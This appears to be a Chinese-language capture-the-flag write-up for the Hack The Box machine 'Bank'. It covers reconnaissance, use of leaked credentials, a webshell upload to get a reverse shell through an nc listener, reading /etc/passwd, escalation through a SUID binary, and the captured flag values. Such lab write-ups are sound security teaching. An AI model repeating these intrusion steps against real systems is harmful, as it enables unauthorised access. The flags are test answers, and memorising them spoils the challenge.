HTB:Bank[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

提取出靶机TCP开放端口

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用curl对域名进行访问

使用浏览器访问该域名

边界突破

使用ffuf对该域名进行路径FUZZ

访问balance-transfer接口可见大量.acc文件

点击右上角的Size按钮可对文件大小进行升序排列

通过上述凭证登录后,在左侧可见Support栏目

使用Yakit构造请求包发送Webshell

本地侧nc开始监听

权限提升

查看靶机系统内存在的用户

查找当前系统内的SUID文件


连接至HTB服务器并启动靶机

靶机IP:10.10.10.29

分配IP:10.10.16.13


信息收集

使用rustscan对靶机TCP端口进行开放扫描

复制代码
rustscan -a 10.10.10.29 -r 1-65535 --ulimit 5000 | tee res
提取出靶机TCP开放端口
复制代码
ports=$(grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ','

22,53,80

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# ports=(grep syn-ack res \| awk -F '/' '{print 1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# echo $ports

22,53,80

使用nmap对靶机TCP开放端口进行脚本、服务扫描

复制代码
nmap -sT -p$ports -sCV -Pn 10.10.10.29
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
复制代码
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.29
使用nmap对靶机常用UDP端口进行开放扫描
复制代码
nmap -sU --top-ports 20 -Pn 10.10.10.29
  • 将靶机IP与bank.htb域名进行绑定

    sed -i '1i 10.10.10.29 bank.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# sed -i '1i 10.10.10.29 bank.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# head /etc/hosts -n 1

10.10.10.29 bank.htb

使用curl对域名进行访问

复制代码
curl -I http://bank.htb

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -I http://bank.htb

HTTP/1.1 302 Found

Date: Tue, 07 Jan 2025 09:12:29 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.21

Set-Cookie: HTBBankAuth=1ukl795lkhp59fqphdlk8s7gb0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

location: login.php

Content-Type: text/html

使用浏览器访问该域名

边界突破

使用ffuf对该域名进行路径FUZZ

复制代码
ffuf -u http://bank.htb/FUZZ -w ../dictionary/Entire-Dir.txt -t 200
访问balance-transfer接口可见大量.acc文件
点击右上角的Size按钮可对文件大小进行升序排列
  • 点击查看这个与其他.acc文件大小不一样的文件
  • 得到凭证

名称:Christos Christopoulos

邮箱:chris@bank.htb

密码:!##HTBB4nkP4ssw0rd!##

通过上述凭证登录后,在左侧可见Support栏目

  • 点击后可见该页支持文件上传
  • 键盘按Ctrl+U查看该页原码
  • 由该页注释可知,.htb文件可充当.php文件进行解析

使用Yakit构造请求包发送Webshell

  • My Tickets栏目中可见文件成功上传
本地侧nc开始监听
复制代码
rlwrap -cAr nc -lvnp 1425
  • 直接点击Click Here访问Webshell文件,本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# rlwrap -cAr nc -lvnp 1425

listening on [any] 1425 ...

connect to [10.10.16.13] from (UNKNOWN) [10.10.10.29] 45632

Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux

13:09:56 up 3:20, 0 users, load average: 0.37, 0.09, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

www-data

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • 提升TTY

    python3 -c 'import pty;pty.spawn("/bin/bash")'


权限提升

查看靶机系统内存在的用户

复制代码
cat /etc/passwd
  • 当前用户权限可以直接查看chris下的flag文件

www-data@bank:/$ find / -name 'user.txt' -type f 2>/dev/null

find / -name 'user.txt' -type f 2>/dev/null

/home/chris/user.txt

www-data@bank:/$ cat /home/chris/user.txt

cat /home/chris/user.txt

8fc44025442af344df63cad1c33e35c8

查找当前系统内的SUID文件

复制代码
find / -perm -4000 -type f -ls 2>/dev/null
  • 直接运行**/var/htb/bin/emergency**文件即可提权至root用户

www-data@bank:/$ /var/htb/bin/emergency

/var/htb/bin/emergency

id

id

uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

whoami

whoami

root

  • 在/root目录下找到root.txt文件

find / -name 'root.txt' -type f

find / -name 'root.txt' -type f

/root/root.txt

cat /root/root.txt

cat /root/root.txt

38e39916caa580e4ffaee0a6379444c9

相关推荐
凉拌青瓜哈8 分钟前
DVWA-LOW级-SQL手工注入漏洞测试(MySQL数据库)+sqlmap自动化注入-小白必看(超详细)
mysql·安全·网络安全
学习溢出4 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
安胜ANSCEN4 小时前
还在靠防火墙硬抗?网络安全需要从“单点防御“转向“系统化防护“!
网络安全·应急响应·威胁检测
浩浩测试一下19 小时前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
周某人姓周1 天前
搭建渗透测试环境
网络安全·网络攻击模型
码农12138号1 天前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
爱思德学术1 天前
CCF发布《计算领域高质量科技期刊分级目录(2025年版)》
大数据·网络安全·自动化·软件工程
小红卒2 天前
upload-labs靶场通关详解:第21关 数组绕过
web安全·网络安全·文件上传漏洞
kp000002 天前
GitHub信息收集
web安全·网络安全·信息收集
LuDvei2 天前
CH9121T电路及配置详解
服务器·嵌入式硬件·物联网·网络协议·tcp/ip·网络安全·信号处理